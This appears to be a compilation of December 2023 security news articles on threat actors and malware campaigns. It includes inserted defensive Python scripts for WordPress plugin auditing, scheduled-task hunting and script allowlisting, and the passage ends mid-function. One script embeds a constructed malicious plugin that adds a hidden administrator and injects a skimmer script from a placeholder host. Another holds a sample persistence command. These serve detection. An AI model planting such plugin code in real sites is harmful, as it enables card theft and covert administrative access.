"The Cloud Atlas group has been active for many years, carefully thinking through every aspect of their attacks," Positive Technologies said of the group last year.

"The group's toolkit has not changed for years—they try to hide their malware from researchers by using one-time payload requests and validating them. The group avoids network and file attack detection tools by using legitimate cloud storage and well-documented software features, in particular in Microsoft Office."

The development comes as the company said that at least 20 organizations located in Russia have been compromised using Decoy Dog, a modified version of Pupy RAT, attributing it to an advanced persistent threat actor it calls Hellhounds.

The actively maintained malware, besides allowing the adversary to remotely control the infected host, comes with a scriptlet designed to transmit telemetry data to an "automated" account on Mastodon with the name "Lamir Hasabat" (@lahat) on the Mindly.Social instance.

"After materials on the first version of Decoy Dog were published, the malware authors went to a lot of effort to hamper its detection and analysis both in traffic and in the file system," security researchers Stanislav Pyzhov and Aleksandr Grigorian said.


British LAPSUS$ Teen Members Sentenced for High-Profile Attacks
24.12.23  Attack  The Hacker News

Two British teens part of the LAPSUS$ cyber crime and extortion gang have been sentenced for their roles in orchestrating a string of high-profile attacks against a number of companies.

Arion Kurtaj, an 18-year-old from Oxford, has been sentenced to an indefinite hospital order due to his intent to get back to cybercrime "as soon as possible," BBC reported. Kurtaj, who is autistic, was deemed unfit to stand trial.

Another LAPSUS$ member, a 17-year-old unnamed minor, was sentenced to an 18-month-long Youth Rehabilitation Order, including a three-month intensive supervision and surveillance requirement. He was found guilty of two counts of fraud, two Computer Misuse Act offenses, and one count of blackmail.

Both defendants were initially arrested in January 2022, and then released under investigation. They were re-arrested in March 2022. While Kurtaj was later granted bail, he continued to attack various companies until he was arrested again in September.

The attack spree, which took place between August 2020 and September 2022, targeted BT, EE, Globant, LG, Microsoft, NVIDIA, Okta, Revolut, Rockstar Games, Samsung, Ubisoft, Uber, and Vodafone.

LAPSUS$ is said to comprise members from the U.K. and Brazil. A third member of the group, also suspected to be a teen, was arrested in the South American nation in October 2022.

A report published by the U.S. Department of Homeland Security's (DHS) Cyber Safety Review Board (CSRB) this year revealed the threat actor's use of SIM-swapping attacks to take over victim accounts and infiltrate target networks. It also used a Telegram channel to publicize its operations and extort its victims.

Over the past year, the notoriety attracted by LAPSUS$ has also led to the emergence of another group called Scattered Spider. Both groups are part of a larger entity that calls itself the Comm.

According to the Federal Bureau of Investigation, the Comm consists of a "geographically diverse group of individuals, organized in various subgroups, all of whom coordinate through online communication applications such as Discord and Telegram" to engage in corporate intrusions, SIM swapping, crypto theft, real-life violence, and swatting.

"This case serves as an example of the dangers that young people can be drawn towards whilst online and the serious consequences it can have for someone's broader future," Amanda Horsburgh, detective chief superintendent from the City of London Police, said.

"Many young people wish to explore how technology works and what vulnerabilities exist. This can include learning to code, interacting with like-minded individuals online and experimenting with tools. Unfortunately, the digital world can also be tempting to young people for the


Rogue WordPress Plugin Exposes E-Commerce Sites to Credit Card Theft
23.12.23  Crime  The Hacker News

Threat hunters have discovered a rogue WordPress plugin that's capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information.

The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri.

"As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy," security researcher Ben Martin said. "In this case, comments claim the code to be 'WordPress Cache Addons.'"

Malicious plugins typically find their way to WordPress sites via either a compromised admin user or the exploitation of security flaws in another plugin already installed on the site.

Post installation, the plugin replicates itself to the mu-plugins (or must-use plugins) directory so that it's automatically enabled and conceals its presence from the admin panel.

"Since the only way to remove any of the mu-plugins is by manually removing the file the malware goes out of its way to prevent this," Martin explained. "The malware accomplishes this by unregistering callback functions for hooks that plugins like this normally use."

The fraudulent plugin also comes with an option to create and hide an administrator user account from the legitimate website admin, so as to avoid raising red flags and maintain access to the target for extended periods of time.

The ultimate objective of the campaign is to inject credit card stealing malware in the checkout pages and exfiltrate the information to an actor-controlled domain.
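The behaviour described above (a must-use plugin with a deceptive header that adds an admin user, strips the hooks the plugin list relies on and injects a script on checkout pages) lends itself to a simple file audit. The script below is an added example, not Sucuri's code: it walks a wp-content/mu-plugins directory, reads each file's "Plugin Name" header and flags files whose contents contain behaviour a cache add-on has no reason to have. The two sample plugin files it audits are constructed for the demo; the hook names in the patterns are real WordPress hooks chosen as illustrations, not the ones the malware is reported to tamper with, and skimmer.example is a placeholder host.

```python
"""Audit a WordPress must-use plugin directory for the traits described above.

Added example (not Sucuri's code). It scans every .php file under
wp-content/mu-plugins, reads the "Plugin Name" header and flags files that
pair a benign-looking header with behaviour a cache add-on has no reason to
have: creating users, granting the administrator role, removing the hooks
the plugin list relies on, loading a remote script, touching checkout pages.
The two sample plugin files are constructed for this demo; the hook names in
the patterns are real WordPress hooks chosen as illustrations, not the ones
the malware is reported to tamper with.
"""
import os
import re
import tempfile

# Each label maps to a pattern a legitimate cache plugin has no business matching.
SUSPICIOUS = {
    "creates users": re.compile(r"\bwp_(insert|create)_user\s*\("),
    "grants admin role": re.compile(r"set_role\(\s*['\"]administrator['\"]"),
    "hides itself from admin": re.compile(
        r"remove_(action|filter)\(\s*['\"](pre_current_active_plugins|all_plugins)['\"]"),
    "loads remote script": re.compile(r"<script[^>]+src=['\"]https?://", re.I),
    "hooks checkout": re.compile(r"is_checkout\s*\(|/checkout"),
    "obfuscated code": re.compile(r"\b(base64_decode|gzinflate|str_rot13|eval)\s*\("),
}
HEADER_RE = re.compile(r"Plugin Name:\s*(.+)")


def audit_file(path):
    """Return (header_name, [finding labels]) for one PHP file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    m = HEADER_RE.search(src)
    name = m.group(1).strip() if m else "(no header)"
    return name, [label for label, rx in SUSPICIOUS.items() if rx.search(src)]


def audit_mu_plugins(mu_dir):
    """Walk mu_dir and return {relative_path: (name, findings)} for flagged files only."""
    report = {}
    for root, _dirs, files in os.walk(mu_dir):
        for fn in sorted(files):
            if fn.endswith(".php"):
                full = os.path.join(root, fn)
                name, findings = audit_file(full)
                if findings:
                    report[os.path.relpath(full, mu_dir)] = (name, findings)
    return report


# Constructed sample: a harmless must-use plugin.
BENIGN = """<?php
/*
Plugin Name: Site Health Ping
*/
add_action('init', function () { update_option('last_ping', time()); });
"""

# Constructed sample modelled on the behaviour described in the article:
# deceptive header, hidden admin user, hook removal, script on checkout.
# skimmer.example is a placeholder host, not an indicator from the report,
# and 'my_plugin_list_notice' is an illustrative callback name.
ROGUE = """<?php
/*
Plugin Name: WordPress Cache Addons
Description: Speeds up your site.
*/
add_action('init', function () {
    if (!username_exists('cacheadmin')) {
        $id = wp_insert_user(['user_login' => 'cacheadmin', 'user_pass' => 'x']);
        (new WP_User($id))->set_role('administrator');
    }
});
remove_action('pre_current_active_plugins', 'my_plugin_list_notice');
add_action('wp_footer', function () {
    if (is_checkout()) echo '<script src="https://skimmer.example/s.js"></script>';
});
"""


def run_demo():
    """Write the two constructed files into a temp mu-plugins dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        mu = os.path.join(tmp, "wp-content", "mu-plugins")
        os.makedirs(mu)
        for fn, body in (("site-health.php", BENIGN), ("cache-addons.php", ROGUE)):
            with open(os.path.join(mu, fn), "w", encoding="utf-8") as fh:
                fh.write(body)
        return audit_mu_plugins(mu)


if __name__ == "__main__":
    for rel, (name, findings) in run_demo().items():
        print(f"{rel}: header says '{name}'; flagged for: {', '.join(findings)}")
```

Point `audit_mu_plugins()` at a real installation's mu-plugins directory to run it outside the demo. Because mu-plugins cannot be deactivated from the dashboard, pairing this file-level check with a review of administrator accounts in the database (not just the user list the admin panel shows) covers the two hiding places the article describes.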

"Since many WordPress infections occur from compromised wp-admin administrator users it only stands to reason that they've needed to work within the constraints of the access levels that they have, and installing plugins is certainly one of the key abilities that WordPress admins possess," Martin said.

The disclosure arrives weeks after the WordPress security community warned of a phishing campaign that alerts users of an unrelated security flaw in the web content management system and tricks them into installing a plugin under the guise of a patch. The plugin, for its part, creates an admin user and deploys a web shell for persistent remote access.

Sucuri said that the threat actors behind the campaign are leveraging the "RESERVED" status associated with a CVE identifier, which happens when it has been reserved for use by a CVE Numbering Authority (CNA) or security researcher, but the details are yet to be filled.


It also comes as the website security firm discovered another Magecart campaign that uses the WebSocket communications protocol to insert the skimmer code on online storefronts. The malware then gets triggered upon clicking a fake "Complete Order" button that's overlaid on top of the legitimate checkout button.

Europol's spotlight report on online fraud released this week described digital skimming as a persistent threat that results in the theft, re-sale, and misuse of credit card data. "A major evolution in digital skimming is the shift from the use of front-end malware to back-end malware, making it more difficult to detect," it said.

The E.U. law enforcement agency said it also notified 443 online merchants that their customers' credit card or payment card data had been compromised via skimming attacks.

Group-IB, which also partnered with Europol on the cross-border cybercrime fighting operation codenamed Digital Skimming Action, said it detected and identified 23 families of JS-sniffers, including ATMZOW, health_check, FirstKiss, FakeGA, AngryBeaver, Inter, and R3nin, which were used against companies in 17 different countries across Europe and the Americas.

"In total, 132 JS-sniffer families are known, as of the end of 2023, to have compromised websites worldwide," the Singapore-headquartered firm added.

That's not all. Bogus ads on Google Search and Twitter for cryptocurrency platforms have been found to promote a cryptocurrency drainer named MS Drainer that's estimated to have already plundered $58.98 million from 63,210 victims since March 2023 via a network of 10,072 phishing websites.

"By targeting specific audiences through Google search terms and the following base of X, they can select specific targets and launch continuous phishing campaigns at a very low cost," ScamSniffer said.


Operation RusticWeb: Rust-Based Malware Targets Indian Government Entities
23.12.23  Virus  The Hacker News

Indian government entities and the defense sector have been targeted by a phishing campaign that's engineered to drop Rust-based malware for intelligence gathering.

The activity, first detected in October 2023, has been codenamed Operation RusticWeb by enterprise security firm SEQRITE.

"New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate confidential documents to a web-based service engine, instead of a dedicated command-and-control (C2) server," security researcher Sathwik Ram Prakki said.

Tactical overlaps have been uncovered between the cluster and those widely tracked under the monikers Transparent Tribe and SideCopy, both of which are assessed to be linked to Pakistan.

SideCopy is also a suspected subordinate element within Transparent Tribe. Last month, SEQRITE detailed multiple campaigns undertaken by the threat actor targeting Indian government bodies to deliver numerous trojans such as AllaKore RAT, Ares RAT, and DRat.

Other recent attack chains documented by ThreatMon have employed decoy Microsoft PowerPoint files as well as specially crafted RAR archives susceptible to CVE-2023-38831 for malware delivery, enabling unbridled remote access and control.

"The SideCopy APT Group's infection chain involves multiple steps, each carefully orchestrated to ensure successful compromise," ThreatMon noted earlier this year.

The latest set of attacks commences with a phishing email, leveraging social engineering techniques to trick victims into interacting with malicious PDF files that drop Rust-based payloads for enumerating the file system in the background while displaying the decoy file to the victim.


Besides amassing files of interest, the malware is equipped to collect system information and transmit it to the C2 server, but it lacks the features of other advanced stealer malware available in the cybercrime underground.

A second infection chain identified by SEQRITE in December employs a similar multi-stage process but substitutes the Rust malware with a PowerShell script that takes care of the enumeration and exfiltration steps.

But in an interesting twist, the final-stage payload is launched via a Rust executable that goes by the name "Cisco AnyConnect Web Helper." The gathered information is ultimately uploaded to the oshi[.]at domain, an anonymous public file-sharing engine called OshiUpload.

"Operation RusticWeb could be linked to an APT threat as it shares similarities with various Pakistan-linked groups," Ram Prakki said.

The disclosure comes nearly two months after Cyble uncovered a malicious Android app utilized by the DoNot Team targeting individuals in the Kashmir region of India.

The nation-state actor, also known by the names APT-C-35, Origami Elephant, and SECTOR02, is believed to be of Indian origin and has a history of utilizing Android malware to infiltrate devices belonging to people in Kashmir and Pakistan.

The variant examined by Cyble is a trojanized version of an open-source GitHub project called "QuranApp: Read and Explore" that comes fitted with a wide range of spyware features to record audio and VoIP calls, capture screenshots, gather data from various apps, download additional APK files, and track the victim's location.

"The DoNot group's relentless efforts to refine their tools and techniques underscore the ongoing threat they pose, particularly in their targeting of individuals in the sensitive Kashmir region of India," Cyble said.


Decoy Microsoft Word Documents Used to Deliver Nim-Based Malware
23.12.23  Virus  The Hacker News

A new phishing campaign is leveraging decoy Microsoft Word documents as bait to deliver a backdoor written in the Nim programming language.

"Malware written in uncommon programming languages puts the security community at a disadvantage as researchers and reverse engineers' unfamiliarity can hamper their investigation," Netskope researchers Ghanashyam Satpathy and Jan Michael Alcantara said.

Nim-based malware has been a rarity in the threat landscape, although that has been slowly changing in recent years as attackers continue to either develop custom tools from scratch using the language or port existing versions of their nefarious programs to it.

This has been demonstrated in the case of loaders such as NimzaLoader, Nimbda, IceXLoader, as well as ransomware families tracked under the names Dark Power and Kanti.

The attack chain documented by Netskope begins with a phishing email containing a Word document attachment that, when opened, urges the recipient to enable macros to activate the deployment of the Nim malware. The email sender disguises themselves as a Nepali government official.

Once launched, the implant is responsible for enumerating running processes to determine the existence of known analysis tools on the infected host and promptly terminate itself should it find one.

Otherwise, the backdoor establishes connections with a remote server that mimics a government domain from Nepal, including the National Information Technology Center (NITC), and awaits further instructions. The command-and-control (C2) servers are no longer accessible -

mail[.]mofa[.]govnp[.]org
nitc[.]govnp[.]org
mx1[.]nepal[.]govnp[.]org
dns[.]govnp[.]org

"Nim is a statically typed compiled programming language," the researchers said. "Aside from its familiar syntax, its cross-compilation features allow attackers to write one malware variant and have it cross-compiled to target different platforms."

The disclosure comes as Cyble revealed a social engineering campaign that leverages messages on social media platforms to deliver a new Python-based stealer malware called Editbot Stealer that's designed to harvest and exfiltrate valuable data via an actor-controlled Telegram channel.


Even as threat actors are experimenting with new malware strains, phishing campaigns have also been observed distributing known malware such as DarkGate and NetSupport RAT via email and compromised websites with fake update lures (aka RogueRaticate), particularly those from a cluster dubbed BattleRoyal.

Enterprise security firm Proofpoint said it identified at least 20 campaigns that used DarkGate malware between September and November 2023, before switching to NetSupport RAT earlier this month.

One attack sequence identified in early October 2023 particularly stands out for chaining two traffic delivery systems (TDSs) – 404 TDS and Keitaro TDS – to filter and redirect victims meeting their criteria to an actor-operated domain hosting a payload that exploited CVE-2023-36025 (CVSS score: 8.8), a high-severity Windows SmartScreen security bypass that was addressed by Microsoft in November 2023.

This implies BattleRoyal weaponized this vulnerability as a zero-day a month before it was publicly revealed by the tech giant.

DarkGate is designed to steal information and download additional malware payloads, while NetSupport RAT, which started off as a bona fide remote administration tool, has metamorphosed into a potent weapon wielded by malevolent actors to infiltrate systems and establish unfettered remote control.

"Cybercriminal threat actors [are] adopting new, varied, and increasingly creative attack chains – including the use of various TDS tools – to enable malware delivery," Proofpoint said.

"Additionally, the use of both email and fake update lures shows the actor using multiple types of social engineering techniques in an attempt to get users to install the final payload."

DarkGate has also been put to use by other threat actors like TA571 and TA577, both of which are known to disseminate a variety of malware, including AsyncRAT, NetSupport, IcedID, PikaBot, and QakBot (aka Qbot).

"TA577 for example, one of the most prominent Qbot distributors, returned to email threat data in September to deliver DarkGate malware and has since been observed delivering PikaBot in campaigns that typically have tens of thousands of messages," Selena Larson, senior threat intelligence analyst at Proofpoint, told The Hacker News.


UAC-0099 Using WinRAR Exploit to Target Ukrainian Firms with LONEPAGE Malware
23.12.23  Virus  The Hacker News

The threat actor known as UAC-0099 has been linked to continued attacks aimed at Ukraine, some of which leverage a high-severity flaw in the WinRAR software to deliver a malware strain called LONEPAGE.

"The threat actor targets Ukrainian employees working for companies outside of Ukraine," cybersecurity firm Deep Instinct said in a Thursday analysis.

UAC-0099 was first documented by the Computer Emergency Response Team of Ukraine (CERT-UA) in June 2023, detailing its attacks against state organizations and media entities for espionage motives.

The attack chains leveraged phishing messages containing HTA, RAR, and LNK file attachments that led to the deployment of LONEPAGE, a Visual Basic Script (VBS) malware that's capable of contacting a command-and-control (C2) server to retrieve additional payloads such as keyloggers, stealers, and screenshot malware.

"During 2022-2023, the mentioned group received unauthorized remote access to several dozen computers in Ukraine," CERT-UA said at the time.

The latest analysis from Deep Instinct reveals that the use of HTA attachments is just one of three different infection chains, the other two of which leverage self-extracting (SFX) archives and booby-trapped ZIP files. The ZIP files exploit the WinRAR vulnerability (CVE-2023-38831, CVSS score: 7.8) to distribute LONEPAGE.


In the former, the SFX file houses an LNK shortcut that's disguised as a DOCX file for a court summons while using the icon for Microsoft WordPad to entice the victim into opening it, resulting in the execution of malicious PowerShell code that drops the LONEPAGE malware.

The other attack sequence uses a specially crafted ZIP archive that's susceptible to CVE-2023-38831, with Deep Instinct finding two such artifacts created by UAC-0099 on August 5, 2023, three days after WinRAR maintainers released a patch for the bug.

"The tactics used by 'UAC-0099' are simple, yet effective," the company said. "Despite the different initial infection vectors, the core infection is the same — they rely on PowerShell and the creation of a scheduled task that executes a VBS file."

The development comes as CERT-UA warned of a new wave of phishing messages purporting to be outstanding Kyivstar dues to propagate a remote access trojan known as Remcos RAT. The agency attributed the campaign to UAC-0050.
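Deep Instinct's summary of the core LONEPAGE infection (PowerShell creating a scheduled task that executes a VBS file) is a pattern a defender can hunt for in process-creation telemetry. The script below is an added example, not Deep Instinct's or CERT-UA's code: it runs over constructed Sysmon Event ID 1-style records (dicts keyed by Image, CommandLine and ParentImage) and returns those where schtasks.exe, launched from a script host, registers a task whose action is a VBS file. Every record in it is made up for the demo; none is an indicator from the report.

```python
"""Hunt process-creation records for the persistence pattern Deep Instinct
describes for LONEPAGE: PowerShell creating a scheduled task whose action runs
a VBS file.

Added example, not Deep Instinct's or CERT-UA's code. It works over a list of
constructed, Sysmon Event ID 1-style process-creation records (dicts keyed by
Image, CommandLine, ParentImage) and returns the ones that match. Every record
below is made up for the demo; none is an indicator from the report.
"""
import re

# Task actions that hand execution to a VBS file or a script host.
VBS_ACTION = re.compile(r"\.vbs\b|\b[wc]script(\.exe)?\b", re.I)
# schtasks invoked with /create (as opposed to /query, /delete, ...).
TASK_CREATE = re.compile(r"\bschtasks(\.exe)?\b.*?\s/create\b", re.I)
# The /tr (task run) argument, quoted or bare.
TASK_ACTION = re.compile(r"/tr\s+(\"[^\"]*\"|\S+)", re.I)
# Parents that indicate the task was created from a script rather than an installer.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    """Last path component of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_suspicious_task_creation(rec):
    """True when schtasks /create, launched from a script host, registers a VBS action."""
    if basename(rec.get("Image", "")) != "schtasks.exe":
        return False
    cmd = rec.get("CommandLine", "")
    if not TASK_CREATE.search(cmd):
        return False
    m = TASK_ACTION.search(cmd)
    action = m.group(1) if m else ""
    return bool(VBS_ACTION.search(action)) and basename(rec.get("ParentImage", "")) in SCRIPT_HOSTS


def hunt(records):
    """Return the records matching the pattern, in input order."""
    return [r for r in records if is_suspicious_task_creation(r)]


SAMPLE_RECORDS = [
    {   # constructed: the pattern from the report (script host -> schtasks -> .vbs)
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": r'schtasks /create /sc minute /mo 3 /tn "Updater" /tr "wscript.exe //B C:\ProgramData\srv.vbs" /f',
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {   # constructed: benign task registered by an installer, action is an .exe
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": r'schtasks /create /sc daily /tn "BackupJob" /tr "C:\Program Files\Backup\backup.exe"',
        "ParentImage": r"C:\Program Files\Backup\setup.exe",
    },
    {   # constructed: PowerShell only querying tasks, nothing created
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": "schtasks /query /fo LIST",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_RECORDS):
        print("suspicious task creation:", hit["CommandLine"])
```

The parent-process condition is what keeps the rule quiet: installers and management agents register tasks all the time, but a task whose action is a VBS file and whose creator is PowerShell or another script host is rare enough on most fleets to warrant a look. Tasks created through the COM API rather than schtasks.exe will not appear as process creations at all; for those, Windows Security event 4698 (task created) carries the same action text and can be fed to `is_suspicious_task_creation()` after mapping its fields.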


Microsoft Warns of New 'FalseFont' Backdoor Targeting the Defense Sector
23.12.23  Virus  The Hacker News

Organizations in the Defense Industrial Base (DIB) sector are in the crosshairs of an Iranian threat actor as part of a campaign designed to deliver a never-before-seen backdoor called FalseFont.

The findings come from Microsoft, which is tracking the activity under its weather-themed moniker Peach Sandstorm (formerly Holmium), which is also known as APT33, Elfin, and Refined Kitten.

"FalseFont is a custom backdoor with a wide range of functionalities that allow operators to remotely access an infected system, launch additional files, and send information to its [command-and-control] servers," the Microsoft Threat Intelligence team said on X (previously Twitter).

The first recorded use of the implant was in early November 2023.

The tech giant further said that the latest development aligns with previous activity from Peach Sandstorm and demonstrates a continued evolution of the threat actor's tradecraft.

In a report published in September 2023, Microsoft linked the group to password spray attacks carried out against thousands of organizations globally between February and July 2023. The intrusions primarily singled out satellite, defense, and pharmaceutical sectors.

The end goal, the company said, is to facilitate intelligence collection in support of Iranian state interests. Peach Sandstorm is believed to have been active since at least 2013.

The disclosure comes as the Israel National Cyber Directorate (INCD) accused Iran and Hezbollah of attempting to unsuccessfully target Ziv Hospital through hacking crews named Agrius and Lebanese Cedar.

The agency also revealed details of a phishing campaign in which a fake advisory for a security flaw in F5 BIG-IP products is employed as a decoy to deliver wiper malware on Windows and Linux systems.

The lure for the targeted attack is a critical authentication bypass vulnerability (CVE-2023-46747, CVSS score: 9.8) that came to light in late October 2023. The scale of the campaign is currently unknown.


Experts Detail Multi-Million Dollar Licensing Model of Predator Spyware
23.12.23  Virus  The Hacker News

A new analysis of the sophisticated commercial spyware called Predator has revealed that its ability to persist between reboots is offered as an "add-on feature" and that it depends on the licensing options opted by a customer.

"In 2021, Predator spyware couldn't survive a reboot on the infected Android system (it had it on iOS)," Cisco Talos researchers Mike Gentile, Asheer Malhotra, and Vitor Ventura said in a report shared with The Hacker News. "However, by April 2022, that capability was being offered to their customers."

Predator is the product of a consortium called the Intellexa Alliance, which includes Cytrox (subsequently acquired by WiSpear), Nexa Technologies, and Senpai Technologies. Both Cytrox and Intellexa were added to the Entity List by the U.S. in July 2023 for "trafficking in cyber exploits used to gain access to information systems."

The latest findings come more than six months after the cybersecurity vendor detailed the inner workings of Predator and its harmonious equation with another loader component called Alien.

"Alien is crucial to Predator's successful functioning, including the additional components loaded by Predator on demand," Malhotra told The Hacker News at the time. "The relationship between Alien and Predator is extremely symbiotic, requiring them to continuously work in tandem to spy on victims."

Predator, which can target both Android and iOS, has been described as a "remote mobile extraction system" that's sold on a licensing model that runs into millions of dollars based on the exploit used for initial access and the number of concurrent infections, putting it out of reach of script kiddies and novice criminals.

Spyware such as Predator and Pegasus, which is developed by NSO Group, often rely on zero-day exploit chains in Android, iOS, and web browsers as covert intrusion vectors. But as Apple and Google continue to plug the security gaps, these exploit chains may be rendered ineffective, forcing them to go back to the drawing board.


However, it's worth noting that the companies behind mercenary surveillance tools can also procure either full or partial exploit chains from exploit brokers and fashion them into an operational exploit that can be employed to effectively breach target devices.

Another key aspect of Intellexa's business model is that it offloads the work of setting up the attack infrastructure to the customers themselves, leaving it with room for plausible deniability should the campaigns come to light (as they inevitably do).

"The delivery of Intellexa's supporting hardware is done at a terminal or airport," the researchers said.

"This delivery method is known as Cost Insurance and Freight (CIF), which is part of the shipping industry's jargon ('Incoterms'). This mechanism allows Intellexa to claim that they have no visibility of where the systems are deployed and eventually located."

On top of that, Intellexa possesses "first-hand knowledge" of whether their customers are performing surveillance operations outside their own borders owing to the fact that the operations are intrinsically connected to the license, which, by default, is restricted to a single phone country code prefix.

This geographic limitation, nonetheless, can be loosened for an additional fee.


Cisco Talos noted that while public exposure of private-sector offensive actors and their campaigns has been successful at attribution efforts, it has had little impact on their ability to conduct and grow their business across the world, even if it may affect their customers, such as governments.

"It may increase the costs by making them buy or create new exploit chains but these vendors appear to have seamlessly acquired new exploit chains, enabling them to remain in business by jumping from one set of exploits to another as a means of initial access," the researchers said.

"What is needed is the public disclosure of technical analyses of the mobile spyware and tangible samples enabling public scrutiny of the malware. Such public disclosures will not only enable greater analyses and drive detection efforts but also impose development costs on vendors to constantly evolve their implants."


Chameleon Android Banking Trojan Variant Bypasses Biometric Authentication
23.12.23  OS  The Hacker News

Cybersecurity researchers have discovered an updated version of an Android banking malware called Chameleon that has expanded its targeting to include users in the U.K. and Italy.

"Representing a restructured and enhanced iteration of its predecessor, this evolved Chameleon variant excels in executing Device Takeover (DTO) using the accessibility service, all while expanding its targeted region," Dutch mobile security firm ThreatFabric said in a report shared with The Hacker News.

Chameleon was previously documented by Cyble in April 2023, noting that it had been used to single out users in Australia and Poland since at least January. Like other banking malware, it's known to abuse its permissions to Android's accessibility service to harvest sensitive data and conduct overlay attacks.

The rogue apps containing the earlier version were hosted on phishing pages and found to impersonate genuine institutions in the countries, such as the Australian Taxation Office (ATO) and a cryptocurrency trading platform called CoinSpot, in an attempt to lend them a veil of credibility.

The latest findings from ThreatFabric show that the banking trojan is now being delivered via Zombinder, an off-the-shelf dropper-as-a-service (DaaS) that's sold to other threat actors and which can be used to "bind" malicious payloads to legitimate apps.

Although the offering was suspected to have been shut down earlier this year, it resurfaced last month, advertising capabilities to bypass the 'Restricted Settings' feature in Android to install malware on devices and obtain access to the accessibility service.

Both the malicious artifacts distributing Chameleon masquerade as the Google Chrome web browser. Their package names are listed below -

Z72645c414ce232f45.Z35aad4dde2ff09b48
com.busy.lady

A notable feature of the enhanced variant is its ability to conduct Device Takeover (DTO) fraud, which leverages the accessibility service to perform unauthorized actions on the victim's behalf.


But in order to trick users into enabling the setting, the malware checks the Android version on the installed device and if it's found to be Android 13 or later, prompts the user to turn it on.

"Upon receiving confirmation of Android 13 Restricted Settings being present on the infected device, the banking trojan initiates the loading of an HTML page," ThreatFabric explained. "The page is guiding users through a manual step-by-step process to enable the accessibility service on Android 13 and higher."

Another new addition is the use of Android APIs to disrupt the biometric operations of the targeted device by covertly transitioning the lock screen authentication mechanism to a PIN so as to allow the malware to "unlock the device at will" using the accessibility service.

"The emergence of the new Chameleon banking trojan is another example of the sophisticated and adaptive threat landscape within the Android ecosystem," the company said. "Evolving from its earlier iteration, this variant demonstrates increased resilience and advanced new features."

The development comes as Zimperium revealed that 29 malware families – 10 of them new – targeted 1,800 banking applications across 61 countries over the past year. The new active families include Nexus, Godfather, PixPirate, Saderat, Hook, PixBankBot, Xenomorph v3, Vultur, BrasDex, and GoatRAT.

The top targeted countries comprise the U.S. (109 bank apps), the U.K. (48), Italy (44), Australia (34), Turkey (32), France (30), Spain (29), Portugal (27), Germany (23), Canada (17), and Brazil (11). The most targeted financial services apps are PhonePe (India), WeChat, Bank of America and Wells Fargo (U.S.), Binance (Malta), Barclays (U.K.), QNB Finansbank (Turkey), and CaixaBank (Spain).

"Traditional banking applications remain the prime target, with a staggering 1103 apps – accounting for 61% of the targets – while the emerging FinTech and Trading apps are now in the crosshairs, making up the remaining 39%," the company said.


New JavaScript Malware Targeted 50,000+ Users at Dozens of Banks Worldwide
23.12.23  Virus  The Hacker News


A new piece of JavaScript malware has been observed attempting to steal users' online banking account credentials as part of a campaign that has targeted more than 40 financial institutions across the world.

The activity cluster, which employs JavaScript web injections, is estimated to have led to at least 50,000 infected user sessions spanning North America, South America, Europe, and Japan.

IBM Security Trusteer said it detected the campaign in March 2023.

"Threat actors' intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users' credentials in order to then access and likely monetize their banking information," security researcher Tal Langus said.

Attack chains are characterized by the use of scripts loaded from the threat actor-controlled server ("jscdnpack[.]com"), specifically targeting a page structure that's common to several banks. It's suspected the malware is delivered to targets by some other means, e.g., via phishing emails or malvertising.

When the victim visits a bank website, the login page is altered to incorporate malicious JavaScript capable of harvesting the credentials and one-time passwords (OTPs). The script is obfuscated to conceal its true intent.

"This web injection doesn't target banks with different login pages, but it does send data about the infected machine to the server and can easily be modified to target other banks," Langus said.

"The script's behavior is highly dynamic, continuously querying both the command-and-control (C2) server and the current page structure and adjusting its flow based on the information obtained."

The response from the server determines its next course of action, allowing it to erase traces of the injections, and insert fraudulent user interface elements to accept OTPs to bypass security protections as well as introduce an error message saying online banking services will be unavailable for a time period of 12 hours.

IBM said it's an attempt to dissuade the victims from logging in to their accounts, providing the threat actors with a window of opportunity to seize control of the accounts and perform unauthorized actions.
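The injection described above works by getting an extra script, loaded from an actor-controlled host, onto a login page whose structure is shared by several banks. The script below is an added example, not IBM Trusteer's code: it parses an HTML document, lists every external script source not on the site's allowlist (plus the count of inline script blocks), and builds the Content-Security-Policy header that would let the browser enforce the same allowlist. bank.example and static.bank.example are hypothetical hosts; the sample login page is constructed and keeps the report's domain in its defanged jscdnpack[.]com form.

```python
"""Flag script sources on a login page that are not on the site's allowlist.

Added example, not IBM Trusteer's code. It parses an HTML document, collects
every <script src=...> plus the number of inline <script> blocks, and reports
external sources whose host is not in ALLOWED_SCRIPT_HOSTS. csp_header() then
turns the same allowlist into a Content-Security-Policy the browser enforces.
bank.example / static.bank.example are hypothetical hosts; the sample page is
constructed and keeps the report's domain in its defanged jscdnpack[.]com form.
"""
import re
from html.parser import HTMLParser

ALLOWED_SCRIPT_HOSTS = {"bank.example", "static.bank.example"}  # hypothetical

# Host part of an absolute or protocol-relative URL; relative URLs do not match
# and are treated as same-origin. A plain regex is used rather than urlparse so
# that defanged hosts containing "[.]" can be handled as ordinary strings.
HOST_RE = re.compile(r"^(?:https?:)?//([^/:?#]+)", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script sources and count inline script blocks."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src.strip())
        else:
            self.inline += 1


def audit_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return unexpected external script URLs and basic counts for the page."""
    p = ScriptCollector()
    p.feed(html)
    unexpected = []
    for src in p.external:
        m = HOST_RE.match(src)
        if m and m.group(1).lower() not in allowed_hosts:
            unexpected.append(src)
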